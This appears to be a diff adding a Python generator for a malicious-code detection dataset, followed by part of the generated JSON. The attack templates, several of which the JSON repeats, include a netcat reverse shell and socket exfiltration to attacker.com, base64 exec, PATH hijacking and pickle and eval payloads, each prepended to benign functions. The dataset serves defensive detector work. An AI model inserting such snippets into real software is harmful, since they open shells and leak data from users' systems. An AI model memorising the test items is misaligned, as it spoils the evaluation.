|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os
|
| 2 |
+
import json
|
| 3 |
+
import random
|
| 4 |
+
import subprocess
|
| 5 |
+
import tempfile
|
| 6 |
+
import uuid
|
| 7 |
+
from pathlib import Path
|
| 8 |
+
|
| 9 |
+
# ============================================================
|
| 10 |
+
# Attack Templates for Mutation Engine (Track B)
|
| 11 |
+
# ============================================================
|
| 12 |
+
ATTACK_TEMPLATES = {
|
| 13 |
+
"typosquatting": {
|
| 14 |
+
"inject": "import pythonn\n\n",
|
| 15 |
+
"patch": "",
|
| 16 |
+
},
|
| 17 |
+
"obfuscated_exec": {
|
| 18 |
+
"inject": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n",
|
| 19 |
+
"patch": "",
|
| 20 |
+
},
|
| 21 |
+
"env_hijack": {
|
| 22 |
+
"inject": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n",
|
| 23 |
+
"patch": "",
|
| 24 |
+
},
|
| 25 |
+
"subprocess_backdoor": {
|
| 26 |
+
"inject": "import subprocess\ntry:\n subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n pass\n\n",
|
| 27 |
+
"patch": "",
|
| 28 |
+
},
|
| 29 |
+
"eval_hidden": {
|
| 30 |
+
"inject": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\n",
|
| 31 |
+
"patch": "",
|
| 32 |
+
},
|
| 33 |
+
"pickle_deserialization": {
|
| 34 |
+
"inject": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n",
|
| 35 |
+
"patch": "",
|
| 36 |
+
},
|
| 37 |
+
"socket_exfil": {
|
| 38 |
+
"inject": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\n",
|
| 39 |
+
"patch": "",
|
| 40 |
+
},
|
| 41 |
+
"malicious_import": {
|
| 42 |
+
"inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
|
| 43 |
+
"patch": ""
|
| 44 |
+
}
|
| 45 |
+
}
|
| 46 |
+
|
| 47 |
+
def load_benign_files(benign_dir):
    """Read every ``*.py`` file directly inside ``benign_dir``.

    Returns a list of ``{"filename": ..., "code": ...}`` dicts sorted by
    file name. ``os.listdir`` order is arbitrary, so sorting keeps seeded
    runs reproducible across machines. A missing path, or one that is not a
    directory, yields an empty list.
    """
    files_data = []
    if not os.path.isdir(benign_dir):
        return files_data
    for filename in sorted(os.listdir(benign_dir)):
        if not filename.endswith(".py"):
            continue
        # Explicit encoding: the platform default is not UTF-8 everywhere.
        with open(os.path.join(benign_dir, filename), "r", encoding="utf-8") as f:
            files_data.append({"filename": filename, "code": f.read()})
    return files_data
|
| 57 |
+
|
| 58 |
+
def auto_generate_unit_test(filename, code):
    """Build a small unit test for the module source ``code``.

    The test starts with ``import code`` and adds one assertion for the
    first known function that ``code`` actually defines. A name is matched
    as ``def <name>(``, so a mention in a comment, docstring or call site
    does not select an assertion for a function the module lacks. When no
    known function is defined, the test only checks that the module loads.

    ``filename`` is accepted for interface compatibility and is not used.
    """
    known_assertions = (
        ("fibonacci", "assert code.fibonacci(5) == 5\n"),
        ("factorial", "assert code.factorial(5) == 120\n"),
        ("is_prime", "assert code.is_prime(7) == True\n"),
        ("gcd", "assert code.gcd(48, 18) == 6\n"),
        ("is_palindrome", "assert code.is_palindrome('racecar') == True\n"),
        ("celsius_to_fahrenheit", "assert code.celsius_to_fahrenheit(0) == 32\n"),
    )
    test_code = "import code\n"
    for function_name, assertion in known_assertions:
        if f"def {function_name}(" in code:
            return test_code + assertion
    # Minimal test: just ensure the module loads without error
    return test_code + "assert True # module loaded successfully\n"
|
| 77 |
+
|
| 78 |
+
def generate_track_b_scenarios(benign_files, num_examples=40):
    """Track B: build scenarios with the custom mutation engine (always used).

    ``num_examples`` is split into half true positives, a quarter false
    positives, and the remainder as untouched functional samples. The
    default of 40 gives 20 / 10 / 10.

    Args:
        benign_files: non-empty list of ``{"filename", "code"}`` dicts.
        num_examples: total number of scenarios to produce.

    Returns:
        A list of scenario dicts: true positives first, then false
        positives, then functional samples.
    """
    num_true_positive = num_examples // 2
    num_false_positive = num_examples // 4
    num_functional = num_examples - num_true_positive - num_false_positive

    scenarios = []

    # True positives: an attack snippet is prepended to benign code, and
    # the untouched benign code serves as the reference patch.
    for _ in range(num_true_positive):
        bf = random.choice(benign_files)
        attack_name, attack_data = random.choice(list(ATTACK_TEMPLATES.items()))
        scenarios.append({
            "id": f"tp_{uuid.uuid4().hex[:8]}",
            "type": "true_positive",
            "code_snippet": attack_data["inject"] + bf["code"],
            "patch": bf["code"],
            "unit_test_code": auto_generate_unit_test(bf["filename"], bf["code"]),
            "label": "malicious",
            "source": "mutation_engine",
            "attack_type": attack_name,
        })

    # False positives: suspicious-looking but legitimate prefixes.
    fp_templates = [
        ("fp_eval", "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\n"),
        ("fp_requests", "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\n"),
        ("fp_os_environ", "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n"),
        ("fp_base64", "import base64\ndef encode_msg(msg):\n    return base64.b64encode(msg.encode())\n\n"),
    ]
    for _ in range(num_false_positive):
        bf = random.choice(benign_files)
        _, fp_code = random.choice(fp_templates)
        scenarios.append({
            "id": f"fp_{uuid.uuid4().hex[:8]}",
            "type": "false_positive",
            "code_snippet": fp_code + bf["code"],
            "patch": None,
            "unit_test_code": auto_generate_unit_test(bf["filename"], bf["code"]),
            "label": "benign",
            "source": "mutation_engine",
            "attack_type": None,
        })

    # Functional: benign code passed through unchanged.
    for _ in range(num_functional):
        bf = random.choice(benign_files)
        scenarios.append({
            "id": f"fn_{uuid.uuid4().hex[:8]}",
            "type": "functional",
            "code_snippet": bf["code"],
            "patch": None,
            "unit_test_code": auto_generate_unit_test(bf["filename"], bf["code"]),
            "label": "benign",
            "source": "mutation_engine",
            "attack_type": None,
        })
    return scenarios
|
| 134 |
+
|
| 135 |
+
def _sdk_item_to_scenario(item):
    """Convert one synthetic-data-kit record to a scenario dict, or None if it carries no code."""
    if not isinstance(item, dict):
        return None
    code_snippet = item.get("code_snippet") or item.get("code")
    if not code_snippet:
        return None
    patch = item.get("patch")
    # A record that ships a patch is treated as a malicious sample.
    is_malicious = bool(patch)
    return {
        "id": f"{'tp' if is_malicious else 'fn'}_sdk_{uuid.uuid4().hex[:8]}",
        "type": "true_positive" if is_malicious else "functional",
        "code_snippet": code_snippet,
        "patch": patch,
        "unit_test_code": item.get("unit_test_code", "import code\nassert True"),
        "label": "malicious" if is_malicious else "benign",
        "source": "synthetic_data_kit",
        "attack_type": item.get("attack_type", "llm_generated"),
    }


def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10):
    """
    Track A: Use Meta's synthetic-data-kit to generate high-quality code examples.
    Follows the 4-stage pipeline: ingest -> create -> curate -> save-as

    The pipeline runs inside a temporary workspace. The function is
    best-effort: a missing CLI, config or seed directory, a failed or
    timed-out command, or unreadable output prints a warning and returns
    whatever was collected, which may be an empty list.

    Args:
        output_dir: kept for interface compatibility; not used, because all
            intermediate files live in the temporary workspace.
        num_samples: maximum number of scenarios to return.

    Returns:
        A list of scenario dicts in the same schema as Track B.
    """
    sdk_scenarios = []

    # Check if synthetic-data-kit CLI is available
    try:
        subprocess.run(["synthetic-data-kit", "--help"], capture_output=True, check=True)
    except (subprocess.SubprocessError, FileNotFoundError):
        print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
        return sdk_scenarios

    # Path to our SDK config
    config_path = Path(__file__).parent / "sdk_config.yaml"
    if not config_path.exists():
        print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
        return sdk_scenarios

    # Without seed files the later stages would run on a directory that was never created.
    benign_dir = Path(__file__).parent / "benign"
    if not benign_dir.exists():
        print(f"⚠️ Benign seed directory not found at {benign_dir}. Track A disabled.")
        return sdk_scenarios

    # Create a temporary directory for the SDK workspace
    with tempfile.TemporaryDirectory() as tmpdir:
        workspace_dir = Path(tmpdir) / "sdk_workspace"
        workspace_dir.mkdir()
        ingested = workspace_dir / "ingested"
        created = workspace_dir / "created"
        curated = workspace_dir / "curated"
        output_json = workspace_dir / "final_sdk.json"

        try:
            # 1. Ingest (the benign files act as seeds)
            subprocess.run(
                ["synthetic-data-kit", "ingest", str(benign_dir), "--output", str(ingested)],
                check=True, capture_output=True
            )

            # 2. Create (Generate synthetic examples)
            subprocess.run(
                ["synthetic-data-kit", "create", str(ingested),
                 "--type", "qa", "-c", str(config_path), "--output", str(created)],
                check=True, capture_output=True, timeout=600
            )

            # 3. Curate (Filter low-quality examples)
            subprocess.run(
                ["synthetic-data-kit", "curate", str(created), "--output", str(curated)],
                check=True, capture_output=True
            )

            # 4. Save-As (Export to JSON)
            subprocess.run(
                ["synthetic-data-kit", "save-as", str(curated),
                 "--format", "json", "--output", str(output_json)],
                check=True, capture_output=True
            )

            # Load generated data and convert to our format
            if output_json.exists():
                with open(output_json, "r", encoding="utf-8") as f:
                    data = json.load(f)
                if not isinstance(data, list):
                    print("⚠️ SDK output is not a list of records. Skipping Track A data.")
                    data = []
                for item in data:
                    if len(sdk_scenarios) >= num_samples:
                        break
                    # Expecting keys based on sdk_config.yaml prompts
                    scenario = _sdk_item_to_scenario(item)
                    if scenario is not None:
                        sdk_scenarios.append(scenario)
        except subprocess.TimeoutExpired:
            print("⚠️ SDK generation timed out.")
        except subprocess.CalledProcessError as e:
            print(f"⚠️ SDK command failed: {e.stderr.decode() if e.stderr else 'Unknown error'}")
        except (OSError, json.JSONDecodeError) as e:
            print(f"⚠️ Could not read SDK output: {e}")

    return sdk_scenarios
|
| 214 |
+
|
| 215 |
+
def main():
    """Command-line entry point: build the scenario dataset and write it as JSON.

    Track B (mutation engine) scenarios are always generated. Track A
    (synthetic-data-kit) scenarios are added when ``--use-sdk`` is given.
    The combined list is shuffled, written to ``--output``, and a short
    summary is printed.
    """
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("--benign-dir", type=str, default="sentinel_synth/data/benign/")
    parser.add_argument("--output", type=str, default="sentinel_synth/data/scenarios.json")
    parser.add_argument("--use-sdk", action="store_true", help="Use Meta synthetic-data-kit (requires `synthetic-data-kit` CLI)")
    parser.add_argument("--sdk-samples", type=int, default=10, help="Number of SDK samples to generate")
    args = parser.parse_args()

    benign_files = load_benign_files(args.benign_dir)
    if not benign_files:
        print(f"No benign files found in {args.benign_dir}. Create some first.")
        return

    # Start with Track B scenarios (mutation engine)
    scenarios = generate_track_b_scenarios(benign_files, 40)

    # Add Track A (Meta SDK) if requested
    output_dir = os.path.dirname(args.output)
    if args.use_sdk:
        # Track A works in its own temporary workspace; the aggregated data
        # is saved only to `args.output` below.
        sdk_scenarios = generate_track_a_scenarios_with_sdk(output_dir, args.sdk_samples)
        scenarios.extend(sdk_scenarios)
        if sdk_scenarios:
            print(f"Added {len(sdk_scenarios)} SDK-generated scenarios.")

    # Shuffle and save
    random.shuffle(scenarios)
    # A bare filename has no directory part, and os.makedirs("") would raise.
    if output_dir:
        os.makedirs(output_dir, exist_ok=True)
    with open(args.output, "w", encoding="utf-8") as f:
        json.dump(scenarios, f, indent=4)

    print(f"Total scenarios: {len(scenarios)}")
    print(f" Malicious: {len([s for s in scenarios if s['label'] == 'malicious'])}")
    print(f" Benign: {len([s for s in scenarios if s['label'] == 'benign'])}")
    print(f"Saved to {args.output}")
|
| 251 |
+
|
| 252 |
+
if __name__ == "__main__":
|
| 253 |
+
main()
|
sentinel_synth/data/scenarios.json
ADDED
|
@@ -0,0 +1,402 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
[
|
| 2 |
+
{
|
| 3 |
+
"id": "fp_4cc36ade",
|
| 4 |
+
"type": "false_positive",
|
| 5 |
+
"code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
|
| 6 |
+
"patch": null,
|
| 7 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 8 |
+
"label": "benign",
|
| 9 |
+
"source": "mutation_engine",
|
| 10 |
+
"attack_type": null
|
| 11 |
+
},
|
| 12 |
+
{
|
| 13 |
+
"id": "fp_dd7e5a4d",
|
| 14 |
+
"type": "false_positive",
|
| 15 |
+
"code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 16 |
+
"patch": null,
|
| 17 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 18 |
+
"label": "benign",
|
| 19 |
+
"source": "mutation_engine",
|
| 20 |
+
"attack_type": null
|
| 21 |
+
},
|
| 22 |
+
{
|
| 23 |
+
"id": "tp_7ffae123",
|
| 24 |
+
"type": "true_positive",
|
| 25 |
+
"code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef bubble_sort(arr):\n \"\"\"Sort an array using bubble sort.\"\"\"\n n = len(arr)\n for i in range(n):\n for j in range(0, n-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr",
|
| 26 |
+
"patch": "def bubble_sort(arr):\n \"\"\"Sort an array using bubble sort.\"\"\"\n n = len(arr)\n for i in range(n):\n for j in range(0, n-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr",
|
| 27 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 28 |
+
"label": "malicious",
|
| 29 |
+
"source": "mutation_engine",
|
| 30 |
+
"attack_type": "obfuscated_exec"
|
| 31 |
+
},
|
| 32 |
+
{
|
| 33 |
+
"id": "fp_6ab25c4e",
|
| 34 |
+
"type": "false_positive",
|
| 35 |
+
"code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef factorial(n):\n \"\"\"Calculate the factorial of a number.\"\"\"\n if n == 0:\n return 1\n return n * factorial(n - 1)",
|
| 36 |
+
"patch": null,
|
| 37 |
+
"unit_test_code": "import code\nassert code.factorial(5) == 120\n",
|
| 38 |
+
"label": "benign",
|
| 39 |
+
"source": "mutation_engine",
|
| 40 |
+
"attack_type": null
|
| 41 |
+
},
|
| 42 |
+
{
|
| 43 |
+
"id": "tp_c9e41cb4",
|
| 44 |
+
"type": "true_positive",
|
| 45 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
|
| 46 |
+
"patch": "def matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
|
| 47 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 48 |
+
"label": "malicious",
|
| 49 |
+
"source": "mutation_engine",
|
| 50 |
+
"attack_type": "env_hijack"
|
| 51 |
+
},
|
| 52 |
+
{
|
| 53 |
+
"id": "tp_5593ef6c",
|
| 54 |
+
"type": "true_positive",
|
| 55 |
+
"code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 56 |
+
"patch": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 57 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 58 |
+
"label": "malicious",
|
| 59 |
+
"source": "mutation_engine",
|
| 60 |
+
"attack_type": "malicious_import"
|
| 61 |
+
},
|
| 62 |
+
{
|
| 63 |
+
"id": "fn_69406790",
|
| 64 |
+
"type": "functional",
|
| 65 |
+
"code_snippet": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 66 |
+
"patch": null,
|
| 67 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 68 |
+
"label": "benign",
|
| 69 |
+
"source": "mutation_engine",
|
| 70 |
+
"attack_type": null
|
| 71 |
+
},
|
| 72 |
+
{
|
| 73 |
+
"id": "tp_76aa219b",
|
| 74 |
+
"type": "true_positive",
|
| 75 |
+
"code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 76 |
+
"patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 77 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 78 |
+
"label": "malicious",
|
| 79 |
+
"source": "mutation_engine",
|
| 80 |
+
"attack_type": "socket_exfil"
|
| 81 |
+
},
|
| 82 |
+
{
|
| 83 |
+
"id": "fp_661ae03e",
|
| 84 |
+
"type": "false_positive",
|
| 85 |
+
"code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\nclass Queue:\n \"\"\"A simple queue implementation.\"\"\"\n def __init__(self):\n self.items = []\n \n def enqueue(self, item):\n self.items.insert(0, item)\n \n def dequeue(self):\n if not self.is_empty():\n return self.items.pop()\n return None\n \n def is_empty(self):\n return len(self.items) == 0",
|
| 86 |
+
"patch": null,
|
| 87 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 88 |
+
"label": "benign",
|
| 89 |
+
"source": "mutation_engine",
|
| 90 |
+
"attack_type": null
|
| 91 |
+
},
|
| 92 |
+
{
|
| 93 |
+
"id": "fn_afb2fb13",
|
| 94 |
+
"type": "functional",
|
| 95 |
+
"code_snippet": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 96 |
+
"patch": null,
|
| 97 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 98 |
+
"label": "benign",
|
| 99 |
+
"source": "mutation_engine",
|
| 100 |
+
"attack_type": null
|
| 101 |
+
},
|
| 102 |
+
{
|
| 103 |
+
"id": "fn_7d9c3863",
|
| 104 |
+
"type": "functional",
|
| 105 |
+
"code_snippet": "def binary_search(arr, target):\n \"\"\"Perform binary search.\"\"\"\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = (low + high) // 2\n if arr[mid] == target:\n return mid\n elif arr[mid] < target:\n low = mid + 1\n else:\n high = mid - 1\n return -1",
|
| 106 |
+
"patch": null,
|
| 107 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 108 |
+
"label": "benign",
|
| 109 |
+
"source": "mutation_engine",
|
| 110 |
+
"attack_type": null
|
| 111 |
+
},
|
| 112 |
+
{
|
| 113 |
+
"id": "fn_81a53eff",
|
| 114 |
+
"type": "functional",
|
| 115 |
+
"code_snippet": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 116 |
+
"patch": null,
|
| 117 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 118 |
+
"label": "benign",
|
| 119 |
+
"source": "mutation_engine",
|
| 120 |
+
"attack_type": null
|
| 121 |
+
},
|
| 122 |
+
{
|
| 123 |
+
"id": "tp_dd51805d",
|
| 124 |
+
"type": "true_positive",
|
| 125 |
+
"code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 126 |
+
"patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 127 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 128 |
+
"label": "malicious",
|
| 129 |
+
"source": "mutation_engine",
|
| 130 |
+
"attack_type": "obfuscated_exec"
|
| 131 |
+
},
|
| 132 |
+
{
|
| 133 |
+
"id": "tp_82f7c7df",
|
| 134 |
+
"type": "true_positive",
|
| 135 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 136 |
+
"patch": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 137 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 138 |
+
"label": "malicious",
|
